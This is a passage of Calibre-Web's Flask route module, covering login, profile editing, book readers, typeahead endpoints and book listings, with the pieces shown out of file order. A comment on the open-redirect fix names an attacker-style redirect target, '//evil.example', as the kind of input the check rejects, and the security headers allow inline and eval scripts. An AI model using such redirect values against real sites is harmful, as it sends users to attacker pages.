                        nickname=user.name),
                      category="warning")
                return redirect_back(url_for("web.index"))
            elif login_result is None:
                log.info(error)
                flash(_(u"Could not login: %(message)s", message=error), category="error")
            else:
                ip_Address = request.headers.get('X-Forwarded-For', request.remote_addr)
                log.warning('LDAP Login failed for user "%s" IP-address: %s', form['username'], ip_Address)
                flash(_(u"Wrong Username or Password"), category="error")
        else:
            ip_Address = request.headers.get('X-Forwarded-For', request.remote_addr)
            if 'forgot' in form and form['forgot'] == 'forgot':
                # "forgot password" flow: mail a fresh password to the account
                if user != None and user.name != "Guest":
                    ret, __ = reset_password(user.id)
                    if ret == 1:
                        flash(_(u"New Password was send to your email address"), category="info")
                        log.info('Password reset for user "%s" IP-address: %s', form['username'], ip_Address)
                    else:
                        log.error(u"An unknown error occurred. Please try again later")
                        flash(_(u"An unknown error occurred. Please try again later."), category="error")
                else:
                    flash(_(u"Please enter valid username to reset password"), category="error")
                    log.warning('Username missing for password reset IP-address: %s', ip_Address)
            else:
                if user and check_password_hash(str(user.password), form['password']) and user.name != "Guest":
                    login_user(user, remember=bool(form.get('remember_me')))
                    ub.store_user_session()
                    log.debug(u"You are now logged in as: '%s'", user.name)
                    flash(_(u"You are now logged in as: '%(nickname)s'", nickname=user.name), category="success")
                    config.config_is_initial = False
                    return redirect_back(url_for("web.index"))
                else:
                    log.warning('Login failed for user "%s" IP-address: %s', form['username'], ip_Address)
                    flash(_(u"Wrong Username or Password"), category="error")
    next_url = request.args.get('next', default=url_for("web.index"), type=str)
    # Security fix (CWE-601 open redirect): 'next' comes straight from the
    # query string and is later used as a redirect target. Accept only
    # site-local paths; anything carrying a scheme or a host component
    # (including network-path references like "//evil.example") falls back
    # to the start page.
    parsed_next = urlparse(next_url)
    if (url_for("web.logout") == next_url or not next_url.startswith("/")
            or parsed_next.netloc != '' or parsed_next.scheme != ''):
        next_url = url_for("web.index")
    return render_title_template('login.html',
                                 title=_(u"Login"),
                                 next_url=next_url,
                                 config=config,
                                 oauth_check=oauth_check,
                                 mail=config.get_mail_server_configured(), page="login")
@web.route('/logout')
@login_required
def logout():
    """Log the current user out and drop the server-side session entry."""
    if current_user is not None and current_user.is_authenticated:
        # remove the persisted session row before Flask-Login forgets the user
        ub.delete_user_session(current_user.id, flask_session.get('_id',""))
        logout_user()
        # login types 2/3 include OAuth; clear its token state as well
        if feature_support['oauth'] and (config.config_login_type == 2 or config.config_login_type == 3):
            logout_oauth_user()
    log.debug(u"User logged out")
    return redirect(url_for('web.login'))
# ################################### Users own configuration #########################################################
def change_profile(kobo_support, local_oauth_check, oauth_status, translations, languages):
    """Handle the POST of the user's own profile form (helper for /me).

    Validates and applies the submitted settings to ``current_user`` and
    commits; on a validation error the edit form is re-rendered instead.
    """
    to_save = request.form.to_dict()
    current_user.random_books = 0
    # only users with password rights (or admins) may change the password
    if current_user.role_passwd() or current_user.role_admin():
        if to_save.get("password"):
            current_user.password = generate_password_hash(to_save["password"])
    try:
        # the check_*/valid_* helpers raise on invalid or duplicate values
        if to_save.get("kindle_mail", current_user.kindle_mail) != current_user.kindle_mail:
            current_user.kindle_mail = valid_email(to_save["kindle_mail"])
        if to_save.get("email", current_user.email) != current_user.email:
            current_user.email = check_email(to_save["email"])
        if current_user.role_admin():
            if to_save.get("name", current_user.name) != current_user.name:
                # Query User name, if not existing, change
                current_user.name = check_username(to_save["name"])
        current_user.random_books = 1 if to_save.get("show_random") == "on" else 0
        if to_save.get("default_language"):
            current_user.default_language = to_save["default_language"]
        if to_save.get("locale"):
            current_user.locale = to_save["locale"]
        current_user.kobo_only_shelves_sync = int(to_save.get("kobo_only_shelves_sync") == "on") or 0
    except Exception as ex:
        # validation failed: show the message and re-render the form unchanged
        flash(str(ex), category="error")
        return render_title_template("user_edit.html",
                                     content=current_user,
                                     translations=translations,
                                     profile=1,
                                     languages=languages,
                                     title=_(u"%(name)s's profile", name=current_user.name),
                                     page="me",
                                     kobo_support=kobo_support,
                                     registered_oauth=local_oauth_check,
                                     oauth_status=oauth_status)
    # sidebar checkboxes are named "show_<flag>"; sum the flags into a bitmask
    val = 0
    for key, __ in to_save.items():
        if key.startswith('show'):
            val += int(key[5:])
    current_user.sidebar_view = val
    if to_save.get("Show_detail_random"):
        current_user.sidebar_view += constants.DETAIL_RANDOM
    try:
        ub.session.commit()
        flash(_(u"Profile updated"), category="success")
        log.debug(u"Profile updated")
    except IntegrityError:
        ub.session.rollback()
        flash(_(u"Found an existing account for this e-mail address"), category="error")
        log.debug(u"Found an existing account for this e-mail address")
    except OperationalError as e:
        ub.session.rollback()
        log.error("Database error: %s", e)
        flash(_(u"Database error: %(error)s.", error=e), category="error")
@web.route("/me", methods=["GET", "POST"])
@login_required
def profile():
    """Show (GET) or update (POST, via change_profile) the user's own profile."""
    languages = calibre_db.speaking_language()
    translations = babel.list_translations() + [LC('en')]
    kobo_support = feature_support['kobo'] and config.config_kobo_sync
    # OAuth status is only relevant for login type 2 (Github/Google OAuth)
    if feature_support['oauth'] and config.config_login_type == 2:
        oauth_status = get_oauth_status()
        local_oauth_check = oauth_check
    else:
        oauth_status = None
        local_oauth_check = {}
    if request.method == "POST":
        change_profile(kobo_support, local_oauth_check, oauth_status, translations, languages)
    return render_title_template("user_edit.html",
                                 translations=translations,
                                 profile=1,
                                 languages=languages,
                                 content=current_user,
                                 kobo_support=kobo_support,
                                 title=_(u"%(name)s's profile", name=current_user.name),
                                 page="me",
                                 registered_oauth=local_oauth_check,
                                 oauth_status=oauth_status)
# ###################################Show single book ##################################################################
@web.route("/read/<int:book_id>/<book_format>")
@login_required_if_no_ano
@viewer_required
def read_book(book_id, book_format):
    """Open the matching in-browser reader for the requested book/format."""
    book = calibre_db.get_filtered_book(book_id)
    if not book:
        flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
        log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
        return redirect(url_for("web.index"))
    # check if book has bookmark
    bookmark = None
    if current_user.is_authenticated:
        bookmark = ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(current_user.id),
                                                             ub.Bookmark.book_id == book_id,
                                                             ub.Bookmark.format == book_format.upper())).first()
    # pick the reader template by file extension
    if book_format.lower() == "epub":
        log.debug(u"Start epub reader for %d", book_id)
        return render_title_template('read.html', bookid=book_id, title=book.title, bookmark=bookmark)
    elif book_format.lower() == "pdf":
        log.debug(u"Start pdf reader for %d", book_id)
        return render_title_template('readpdf.html', pdffile=book_id, title=book.title)
    elif book_format.lower() == "txt":
        log.debug(u"Start txt reader for %d", book_id)
        return render_title_template('readtxt.html', txtfile=book_id, title=book.title)
    elif book_format.lower() == "djvu":
        log.debug(u"Start djvu reader for %d", book_id)
        return render_title_template('readdjvu.html', djvufile=book_id, title=book.title)
    else:
        # audio formats share one player template
        for fileExt in constants.EXTENSIONS_AUDIO:
            if book_format.lower() == fileExt:
                entries = calibre_db.get_filtered_book(book_id)
                log.debug(u"Start mp3 listening for %d", book_id)
                return render_title_template('listenmp3.html', mp3file=book_id, audioformat=book_format.lower(),
                                             entry=entries, bookmark=bookmark)
        # comic archives: title is enriched with series name/index for display
        for fileExt in ["cbr", "cbt", "cbz"]:
            if book_format.lower() == fileExt:
                all_name = str(book_id)
                title = book.title
                if len(book.series):
                    title = title + " - " + book.series[0].name
                    if book.series_index:
                        title = title + " #" + '{0:.2f}'.format(book.series_index).rstrip('0').rstrip('.')
                log.debug(u"Start comic reader for %d", book_id)
                return render_title_template('readcbr.html', comicfile=all_name, title=title,
                                             extension=fileExt)
    # no reader available for this format
    log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
    flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
    return redirect(url_for("web.index"))
@web.route("/book/<int:book_id>")
@login_required_if_no_ano
def show_book(book_id):
    """Render the detail page for a single book; redirect home when hidden/missing."""
    entries = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
    if entries:
        # resolve language codes to display names in the user's locale
        for index in range(0, len(entries.languages)):
            entries.languages[index].language_name = isoLanguages.get_language_name(get_locale(), entries.languages[
                index].lang_code)
        #try:
        #    entries.languages[index].language_name = isoLanguages.get_language_name(get_locale(), LC.parse(entries.languages[index].lang_code)
        #        .get_language_name(get_locale())
        #except UnknownLocaleError:
        #    entries.languages[index].language_name = _(
        #        isoLanguages.get(part3=entries.languages[index].lang_code).name)
        cc = get_cc_columns(filter_config_custom_read=True)
        book_in_shelfs = []
        shelfs = ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == book_id).all()
        for entry in shelfs:
            book_in_shelfs.append(entry.shelf)
        if not current_user.is_anonymous:
            # read state comes either from Calibre-Web's ReadBook table or
            # from a mapped Calibre custom column (config.config_read_column)
            if not config.config_read_column:
                matching_have_read_book = ub.session.query(ub.ReadBook). \
                    filter(and_(ub.ReadBook.user_id == int(current_user.id), ub.ReadBook.book_id == book_id)).all()
                have_read = len(
                    matching_have_read_book) > 0 and matching_have_read_book[0].read_status == ub.ReadBook.STATUS_FINISHED
            else:
                try:
                    matching_have_read_book = getattr(entries, 'custom_column_' + str(config.config_read_column))
                    have_read = len(matching_have_read_book) > 0 and matching_have_read_book[0].value
                except (KeyError, AttributeError):
                    log.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
                    have_read = None
            archived_book = ub.session.query(ub.ArchivedBook).\
                filter(and_(ub.ArchivedBook.user_id == int(current_user.id),
                            ub.ArchivedBook.book_id == book_id)).first()
            is_archived = archived_book and archived_book.is_archived
        else:
            have_read = None
            is_archived = None
        # natural sort of tags and canonical author ordering for display
        entries.tags = sort(entries.tags, key=lambda tag: tag.name)
        entries = calibre_db.order_authors(entries)
        kindle_list = check_send_to_kindle(entries)
        reader_list = check_read_formats(entries)
        audioentries = []
        for media_format in entries.data:
            if media_format.format.lower() in constants.EXTENSIONS_AUDIO:
                audioentries.append(media_format.format.lower())
        return render_title_template('detail.html',
                                     entry=entries,
                                     audioentries=audioentries,
                                     cc=cc,
                                     is_xhr=request.headers.get('X-Requested-With')=='XMLHttpRequest',
                                     title=entries.title,
                                     books_shelfs=book_in_shelfs,
                                     have_read=have_read,
                                     is_archived=is_archived,
                                     kindle_list=kindle_list,
                                     reader_list=reader_list,
                                     page="book")
    else:
        log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
        flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"),
              category="error")
        return redirect(url_for("web.index"))
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, print_function, unicode_literals

# Standard library
import copy
import json
import mimetypes
import os
from datetime import datetime
from urllib.parse import urlparse

# Third-party
import chardet  # dependency of requests
from babel import Locale as LC
from babel.core import UnknownLocaleError
from babel.dates import format_date
from flask import Blueprint, jsonify
from flask import request, redirect, send_from_directory, make_response, flash, abort, url_for
from flask import session as flask_session
from flask_babel import gettext as _
from flask_login import login_user, logout_user, login_required, current_user
from sqlalchemy.exc import IntegrityError, InvalidRequestError, OperationalError
from sqlalchemy.orm.attributes import flag_modified
from sqlalchemy.sql.expression import text, func, false, not_, and_, or_
from sqlalchemy.sql.functions import coalesce
from werkzeug.datastructures import Headers
from werkzeug.security import generate_password_hash, check_password_hash

# Local
from . import constants, logger, isoLanguages, services
from . import babel, db, ub, config, get_locale, app
from . import calibre_db
from .gdriveutils import getFileFromEbooksFolder, do_gdrive_download
from .helper import check_valid_domain, render_task_status, check_email, check_username, \
    get_cc_columns, get_book_cover, get_download_link, send_mail, generate_random_password, \
    send_registration_mail, check_send_to_kindle, check_read_formats, tags_filters, reset_password, valid_email
from .pagination import Pagination
from .redirect import redirect_back
from .render_template import render_title_template
from .services.worker import WorkerThread
from .usermanagement import login_required_if_no_ano
# Feature flags resolved once at import time from the optional service modules.
feature_support = {
    'ldap': bool(services.ldap),
    'goodreads': bool(services.goodreads_support),
    'kobo': bool(services.kobo)
}
try:
    from .oauth_bb import oauth_check, register_user_with_oauth, logout_oauth_user, get_oauth_status
    feature_support['oauth'] = True
except ImportError:
    # OAuth blueprint (or its dependencies) not installed
    feature_support['oauth'] = False
    oauth_check = {}
try:
    from functools import wraps
except ImportError:
    pass  # We're not using Python 3
try:
    # natural sort keeps e.g. "page2" before "page10"
    from natsort import natsorted as sort
except ImportError:
    sort = sorted  # Just use regular sort then, may cause issues with badly named pages in cbz/cbr files
@app.after_request
def add_security_headers(resp):
    """Attach the standard security headers to every outgoing response."""
    csp = "default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:"
    if request.endpoint == "editbook.edit_book":
        # the edit page loads external cover previews, so relax the policy
        csp += " *"
    resp.headers['Content-Security-Policy'] = csp
    for header_name, header_value in (
            ('X-Content-Type-Options', 'nosniff'),
            ('X-Frame-Options', 'SAMEORIGIN'),
            ('X-XSS-Protection', '1; mode=block'),
            ('Strict-Transport-Security', 'max-age=31536000; includeSubDomains')):
        resp.headers[header_name] = header_value
    return resp
# Blueprint for all end-user facing routes, plus the module-level logger.
web = Blueprint('web', __name__)
log = logger.create()
# ################################### Login logic and rights management ###############################################
def download_required(f):
    """Decorator: allow the view only for users with download rights (else 403)."""
    @wraps(f)
    def wrapper(*args, **kwargs):
        if not current_user.role_download():
            abort(403)
        return f(*args, **kwargs)
    return wrapper
def viewer_required(f):
    """Decorator: allow the view only for users with viewer rights (else 403)."""
    @wraps(f)
    def wrapper(*args, **kwargs):
        if not current_user.role_viewer():
            abort(403)
        return f(*args, **kwargs)
    return wrapper
# ################################### data provider functions #########################################################
@web.route("/ajax/emailstat")
@login_required
def get_email_status_json():
    """Return the current background task list (e-mail/conversion) as JSON."""
    tasks = WorkerThread.getInstance().tasks
    return jsonify(render_task_status(tasks))
@web.route("/ajax/bookmark/<int:book_id>/<book_format>", methods=['POST'])
@login_required
def bookmark(book_id, book_format):
    """Store (or clear) the reader's bookmark position for one book/format."""
    bookmark_key = request.form["bookmark"]
    # drop any previous bookmark for this user/book/format first
    ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(current_user.id),
                                              ub.Bookmark.book_id == book_id,
                                              ub.Bookmark.format == book_format)).delete()
    if not bookmark_key:
        # an empty key means "delete only"
        ub.session_commit()
        return "", 204
    lbookmark = ub.Bookmark(user_id=current_user.id,
                            book_id=book_id,
                            format=book_format,
                            bookmark_key=bookmark_key)
    ub.session.merge(lbookmark)
    ub.session_commit("Bookmark for user {} in book {} created".format(current_user.id, book_id))
    return "", 201
@web.route("/ajax/toggleread/<int:book_id>", methods=['POST'])
@login_required
def toggle_read(book_id):
    """Flip the read/unread status of a book for the current user.

    Uses Calibre-Web's own ReadBook table unless the admin mapped the read
    flag onto a Calibre custom column (config.config_read_column).
    """
    if not config.config_read_column:
        book = ub.session.query(ub.ReadBook).filter(and_(ub.ReadBook.user_id == int(current_user.id),
                                                         ub.ReadBook.book_id == book_id)).first()
        if book:
            if book.read_status == ub.ReadBook.STATUS_FINISHED:
                book.read_status = ub.ReadBook.STATUS_UNREAD
            else:
                book.read_status = ub.ReadBook.STATUS_FINISHED
        else:
            readBook = ub.ReadBook(user_id=current_user.id, book_id = book_id)
            readBook.read_status = ub.ReadBook.STATUS_FINISHED
            book = readBook
        if not book.kobo_reading_state:
            # keep Kobo sync metadata in step with the new read state
            kobo_reading_state = ub.KoboReadingState(user_id=current_user.id, book_id=book_id)
            kobo_reading_state.current_bookmark = ub.KoboBookmark()
            kobo_reading_state.statistics = ub.KoboStatistics()
            book.kobo_reading_state = kobo_reading_state
        ub.session.merge(book)
        ub.session_commit("Book {} readbit toggled".format(book_id))
    else:
        try:
            calibre_db.update_title_sort(config)
            book = calibre_db.get_filtered_book(book_id)
            read_status = getattr(book, 'custom_column_' + str(config.config_read_column))
            if len(read_status):
                read_status[0].value = not read_status[0].value
                calibre_db.session.commit()
            else:
                cc_class = db.cc_classes[config.config_read_column]
                new_cc = cc_class(value=1, book=book_id)
                calibre_db.session.add(new_cc)
                calibre_db.session.commit()
        except (KeyError, AttributeError):
            log.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
            return "Custom Column No.{} is not existing in calibre database".format(config.config_read_column), 400
        except (OperationalError, InvalidRequestError) as e:
            calibre_db.session.rollback()
            # Fix: '%e' is a float conversion and broke the log record when
            # given an exception object; '%s' is the correct placeholder.
            log.error(u"Read status could not set: %s", e)
            return "Read status could not set: {}".format(e), 400
    return ""
@web.route("/ajax/togglearchived/<int:book_id>", methods=['POST'])
@login_required
def toggle_archived(book_id):
    """Flip the per-user archived flag for a book, creating the row on demand."""
    record = ub.session.query(ub.ArchivedBook).filter(
        and_(ub.ArchivedBook.user_id == int(current_user.id),
             ub.ArchivedBook.book_id == book_id)).first()
    if record is None:
        # first toggle for this user/book: create it already archived
        record = ub.ArchivedBook(user_id=current_user.id, book_id=book_id)
        record.is_archived = True
    else:
        record.is_archived = not record.is_archived
        record.last_modified = datetime.utcnow()
    ub.session.merge(record)
    ub.session_commit("Book {} archivebit toggled".format(book_id))
    return ""
@web.route("/ajax/view", methods=["POST"])
@login_required_if_no_ano
def update_view():
    """Persist per-user view settings posted as nested JSON ({element: {prop: value}})."""
    to_save = request.get_json()
    try:
        for element in to_save:
            for param in to_save[element]:
                current_user.set_view_property(element, param, to_save[element][param])
    except Exception as ex:
        # Fix: '%e' is not a valid logging conversion for an exception object
        # and broke the log record; use '%s'.
        log.error("Could not save view_settings: %r %r: %s", request, to_save, ex)
        return "Invalid request", 400
    return "1", 200
# NOTE: dead code intentionally kept as a module-level string literal (it has
# no runtime effect). The former /ajax/getcomic endpoint below references
# modules (rarfile, zipfile, tarfile, sys, codecs) that are no longer
# imported here; re-enabling it would require restoring those imports.
'''
@web.route("/ajax/getcomic/<int:book_id>/<book_format>/<int:page>")
@login_required
def get_comic_book(book_id, book_format, page):
    book = calibre_db.get_book(book_id)
    if not book:
        return "", 204
    else:
        for bookformat in book.data:
            if bookformat.format.lower() == book_format.lower():
                cbr_file = os.path.join(config.config_calibre_dir, book.path, bookformat.name) + "." + book_format
                if book_format in ("cbr", "rar"):
                    if feature_support['rar'] == True:
                        rarfile.UNRAR_TOOL = config.config_rarfile_location
                        try:
                            rf = rarfile.RarFile(cbr_file)
                            names = sort(rf.namelist())
                            extract = lambda page: rf.read(names[page])
                        except:
                            # rarfile not valid
                            log.error('Unrar binary not found, or unable to decompress file %s', cbr_file)
                            return "", 204
                    else:
                        log.info('Unrar is not supported please install python rarfile extension')
                        # no support means return nothing
                        return "", 204
                elif book_format in ("cbz", "zip"):
                    zf = zipfile.ZipFile(cbr_file)
                    names=sort(zf.namelist())
                    extract = lambda page: zf.read(names[page])
                elif book_format in ("cbt", "tar"):
                    tf = tarfile.TarFile(cbr_file)
                    names=sort(tf.getnames())
                    extract = lambda page: tf.extractfile(names[page]).read()
                else:
                    log.error('unsupported comic format')
                    return "", 204

                if sys.version_info.major >= 3:
                    b64 = codecs.encode(extract(page), 'base64').decode()
                else:
                    b64 = extract(page).encode('base64')
                ext = names[page].rpartition('.')[-1]
                if ext not in ('png', 'gif', 'jpg', 'jpeg', 'webp'):
                    ext = 'png'
                extractedfile="data:image/" + ext + ";base64," + b64
                fileData={"name": names[page], "page":page, "last":len(names)-1, "content": extractedfile}
                return make_response(json.dumps(fileData))
        return "", 204
'''
# ################################### Typeahead ##################################################################
@web.route("/get_authors_json", methods=['GET'])
@login_required_if_no_ano
def get_authors_json():
    """Typeahead data source: author names matching the 'q' query parameter."""
    search_term = request.args.get('q')
    return calibre_db.get_typeahead(db.Authors, search_term, ('|', ','))
@web.route("/get_publishers_json", methods=['GET'])
@login_required_if_no_ano
def get_publishers_json():
    """Typeahead data source: publisher names matching the 'q' query parameter."""
    search_term = request.args.get('q')
    return calibre_db.get_typeahead(db.Publishers, search_term, ('|', ','))
@web.route("/get_tags_json", methods=['GET'])
@login_required_if_no_ano
def get_tags_json():
    """Typeahead data source: tags matching 'q', restricted by the user's tag filter."""
    search_term = request.args.get('q')
    return calibre_db.get_typeahead(db.Tags, search_term, tag_filter=tags_filters())
@web.route("/get_series_json", methods=['GET'])
@login_required_if_no_ano
def get_series_json():
    """Typeahead data source: series names matching the 'q' query parameter."""
    search_term = request.args.get('q')
    return calibre_db.get_typeahead(db.Series, search_term)
@web.route("/get_languages_json", methods=['GET'])
@login_required_if_no_ano
def get_languages_json():
    """Typeahead data source: up to five language display names matching 'q'.

    Prefix matches rank first; substring matches pad the list up to five.
    """
    query = (request.args.get('q') or '').lower()
    language_names = isoLanguages.get_language_names(get_locale())
    # query is already lower-cased above (the original lowered it again)
    matches = [s for s in language_names.values() if s.lower().startswith(query)]
    if len(matches) < 5:
        # Fix: the original deduplicated with list(set(...)), which shuffled
        # the suggestion order nondeterministically and could shrink the
        # result below five entries; dedupe in order instead.
        for s in language_names.values():
            if len(matches) >= 5:
                break
            if query in s.lower() and s not in matches:
                matches.append(s)
    return json.dumps([dict(name=r) for r in matches[0:5]])
@web.route("/get_matching_tags", methods=['GET'])
@login_required_if_no_ano
def get_matching_tags():
    """Return the tag ids still reachable under the current advanced-search filters."""
    tag_dict = {'tags': []}
    q = calibre_db.session.query(db.Books).filter(calibre_db.common_filters(True))
    # register a SQLite 'lower' function so ilike works on unicode names
    calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
    author_input = request.args.get('author_name') or ''
    title_input = request.args.get('book_title') or ''
    include_tag_inputs = request.args.getlist('include_tag') or ''
    exclude_tag_inputs = request.args.getlist('exclude_tag') or ''
    q = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + author_input + "%")),
                 func.lower(db.Books.title).ilike("%" + title_input + "%"))
    if len(include_tag_inputs) > 0:
        for tag in include_tag_inputs:
            q = q.filter(db.Books.tags.any(db.Tags.id == tag))
    if len(exclude_tag_inputs) > 0:
        for tag in exclude_tag_inputs:
            q = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
    # collect the distinct tag ids of all books left after filtering
    for book in q:
        for tag in book.tags:
            if tag.id not in tag_dict['tags']:
                tag_dict['tags'].append(tag.id)
    json_dumps = json.dumps(tag_dict)
    return json_dumps
def get_sort_function(sort, data):
    """Translate a sort keyword into a list of SQLAlchemy order_by criteria.

    'stored' recalls the user's last choice for this view; any other value
    is persisted as the new stored choice. Unknown keywords fall back to
    newest-first by timestamp.
    """
    if sort == 'stored':
        sort = current_user.get_view_property(data, 'stored')
    else:
        current_user.set_view_property(data, 'stored', sort)
    order_map = {
        'pubnew': [db.Books.pubdate.desc()],
        'pubold': [db.Books.pubdate],
        'abc': [db.Books.sort],
        'zyx': [db.Books.sort.desc()],
        'new': [db.Books.timestamp.desc()],
        'old': [db.Books.timestamp],
        'authaz': [db.Books.author_sort.asc(), db.Series.name, db.Books.series_index],
        'authza': [db.Books.author_sort.desc(), db.Series.name.desc(), db.Books.series_index.desc()],
        'seriesasc': [db.Books.series_index.asc()],
        'seriesdesc': [db.Books.series_index.desc()],
    }
    return order_map.get(sort, [db.Books.timestamp.desc()])
def render_books_list(data, sort, book_id, page):
    """Central dispatcher for all paginated book listings.

    'data' selects the view (rated/discover/author/series/search/...),
    'sort' the ordering keyword, 'book_id' the filter id where applicable,
    'page' the 1-based page number. Unknown 'data' falls through to the
    plain newest-first index.
    """
    order = get_sort_function(sort, data)
    if data == "rated":
        return render_rated_books(page, book_id, order=order)
    elif data == "discover":
        return render_discover_books(page, book_id)
    elif data == "unread":
        return render_read_books(page, False, order=order)
    elif data == "read":
        return render_read_books(page, True, order=order)
    elif data == "hot":
        return render_hot_books(page)
    elif data == "download":
        return render_downloaded_books(page, order, book_id)
    elif data == "author":
        return render_author_books(page, book_id, order)
    elif data == "publisher":
        return render_publisher_books(page, book_id, order)
    elif data == "series":
        return render_series_books(page, book_id, order)
    elif data == "ratings":
        return render_ratings_books(page, book_id, order)
    elif data == "formats":
        return render_formats_books(page, book_id, order)
    elif data == "category":
        return render_category_books(page, book_id, order)
    elif data == "language":
        return render_language_books(page, book_id, order)
    elif data == "archived":
        return render_archived_books(page, order)
    elif data == "search":
        term = (request.args.get('query') or '')
        offset = int(int(config.config_books_per_page) * (page - 1))
        return render_search_results(term, offset, order, config.config_books_per_page)
    elif data == "advsearch":
        # advanced-search parameters were stashed in the session by the search view
        term = json.loads(flask_session['query'])
        offset = int(int(config.config_books_per_page) * (page - 1))
        return render_adv_search_results(term, offset, order, config.config_books_per_page)
    else:
        website = data or "newest"
        entries, random, pagination = calibre_db.fill_indexpage(page, 0, db.Books, True, order,
                                                                db.books_series_link,
                                                                db.Books.id == db.books_series_link.c.book,
                                                                db.Series)
        return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
                                     title=_(u"Books"), page=website)
def render_rated_books(page, book_id, order):
    """Render the 'Top Rated Books' page (rating > 9, i.e. 5 stars)."""
    if not current_user.check_visibility(constants.SIDEBAR_BEST_RATED):
        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.ratings.any(db.Ratings.rating > 9),
        order,
        db.books_series_link,
        db.Books.id == db.books_series_link.c.book,
        db.Series)
    return render_title_template('index.html', random=random, entries=entries,
                                 pagination=pagination, id=book_id,
                                 title=_(u"Top Rated Books"), page="rated")
def render_discover_books(page, book_id):
    """Render a random selection of books ('Discover')."""
    if not current_user.check_visibility(constants.SIDEBAR_RANDOM):
        abort(404)
    entries, __, pagination = calibre_db.fill_indexpage(page, 0, db.Books, True, [func.randomblob(2)])
    # Paging is synthetic: every request serves a fresh random page.
    pagination = Pagination(1, config.config_books_per_page, config.config_books_per_page)
    return render_title_template('discover.html', entries=entries, pagination=pagination, id=book_id,
                                 title=_(u"Discover (Random Books)"), page="discover")
def render_hot_books(page):
    """Render the 'Hot Books' page: books ordered by download count.

    As a side effect, download-log entries whose book no longer exists in
    the calibre database are pruned.
    """
    if not current_user.check_visibility(constants.SIDEBAR_HOT):
        abort(404)
    if current_user.show_detail_random():
        random = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
            .order_by(func.random()).limit(config.config_random_books)
    else:
        random = false()
    off = int(int(config.config_books_per_page) * (page - 1))
    all_books = ub.session.query(ub.Downloads, func.count(ub.Downloads.book_id)).order_by(
        func.count(ub.Downloads.book_id).desc()).group_by(ub.Downloads.book_id)
    hot_books = all_books.offset(off).limit(config.config_books_per_page)
    entries = []
    for book in hot_books:
        # Only keep downloads whose book still exists and passes the user's filters.
        download_book = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).filter(
            db.Books.id == book.Downloads.book_id).first()
        if download_book:
            entries.append(download_book)
        else:
            # Stale download entry: the book was deleted from the calibre library.
            ub.delete_download(book.Downloads.book_id)
    num_books = len(entries)  # idiomatic len() instead of entries.__len__()
    pagination = Pagination(page, config.config_books_per_page, num_books)
    return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
                                 title=_(u"Hot Books (Most Downloaded)"), page="hot")
def render_downloaded_books(page, order, user_id):
    """Render the list of books a user has downloaded.

    Admins may inspect any user's downloads; everyone else sees only their own.
    """
    user_id = int(user_id) if current_user.role_admin() else current_user.id
    if not current_user.check_visibility(constants.SIDEBAR_DOWNLOAD):
        abort(404)
    if current_user.show_detail_random():
        random = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
            .order_by(func.random()).limit(config.config_random_books)
    else:
        random = false()
    entries, __, pagination = calibre_db.fill_indexpage(
        page,
        0,
        db.Books,
        ub.Downloads.user_id == user_id,
        order,
        ub.Downloads, db.Books.id == ub.Downloads.book_id)
    # Prune download entries whose book no longer exists in the calibre db.
    for book in entries:
        if not calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
                .filter(db.Books.id == book.id).first():
            ub.delete_download(book.id)
    user = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
    return render_title_template('index.html',
                                 random=random,
                                 entries=entries,
                                 pagination=pagination,
                                 id=user_id,
                                 title=_(u"Downloaded books by %(user)s", user=user.name),
                                 page="download")
def render_author_books(page, author_id, order):
    """Render the books of one author, optionally enriched with Goodreads data."""
    entries, __, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.authors.any(db.Authors.id == author_id),
        [order[0], db.Series.name, db.Books.series_index],
        db.books_series_link,
        db.Books.id == db.books_series_link.c.book,
        db.Series)
    if not entries:
        flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"),
              category="error")
        return redirect(url_for("web.index"))
    # Session.get() replaced Query.get() in SQLAlchemy 2.x.
    if constants.sqlalchemy_version2:
        author = calibre_db.session.get(db.Authors, author_id)
    else:
        author = calibre_db.session.query(db.Authors).get(author_id)
    # Author names are stored with '|' as separator in calibre; display with ','.
    author_name = author.name.replace('|', ',')
    author_info = None
    other_books = []
    if services.goodreads_support and config.config_use_goodreads:
        author_info = services.goodreads_support.get_author_info(author_name)
        other_books = services.goodreads_support.get_other_books(author_info, entries)
